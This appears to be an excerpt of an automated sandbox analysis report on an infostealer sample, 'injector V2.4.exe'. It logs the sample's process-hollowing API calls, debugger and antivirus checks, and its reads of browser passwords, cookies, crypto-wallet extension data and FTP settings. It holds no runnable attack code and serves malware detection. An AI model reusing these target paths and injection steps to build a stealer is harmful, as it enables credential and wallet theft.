          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005365000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043D920 LdrInitializeThunk,4_2_0043D920
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004D5444
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004CCD10 mov eax, dword ptr fs:[00000030h]0_2_004CCD10
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004EB18D mov edi, dword ptr fs:[00000030h]0_2_004EB18D
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004CBD50 mov edi, dword ptr fs:[00000030h]0_2_004CBD50
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004CBD50 mov edi, dword ptr fs:[00000030h]3_2_004CBD50
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004CCD10 mov eax, dword ptr fs:[00000030h]3_2_004CCD10
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D9F90 GetProcessHeap,0_2_004D9F90
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004D5444
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D5438 SetUnhandledExceptionFilter,0_2_004D5438
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D7DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004D7DCA
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D4AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004D4AD9
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004D5444
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D5438 SetUnhandledExceptionFilter,3_2_004D5438
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D7DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004D7DCA
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D4AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004D4AD9

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004EB18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_004EB18D
          Source: C:\Users\user\Desktop\injector V2.4.exeMemory written: C:\Users\user\Desktop\injector V2.4.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D5200 cpuid 0_2_004D5200
          Source: C:\Users\user\Desktop\injector V2.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D58C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004D58C5
          Source: C:\Users\user\Desktop\injector V2.4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: injector V2.4.exe, 00000004.00000002.2295589364.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\injector V2.4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: injector V2.4.exe PID: 6564, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
